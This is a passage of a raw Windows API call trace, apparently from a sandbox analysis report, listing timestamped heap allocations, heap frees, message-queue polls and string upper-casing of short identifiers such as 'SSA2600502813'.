lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0214.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0214.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0214.924] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5b7d) returned 0x3867020 [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c98 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71c08 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71bd8 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3c8 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0214.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0214.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5b7d) returned 0x2a8fcc0 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0214.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0214.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0214.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0214.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0214.927] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0214.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0214.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0214.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0214.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0214.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0214.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0214.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0214.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0214.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0214.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0214.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0214.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0214.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0214.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0214.931] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0214.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab230 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0214.932] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0214.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0214.932] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0214.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0214.932] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab728 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854788 [0214.933] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0214.933] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0214.933] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0214.933] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0214.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0214.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0214.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: 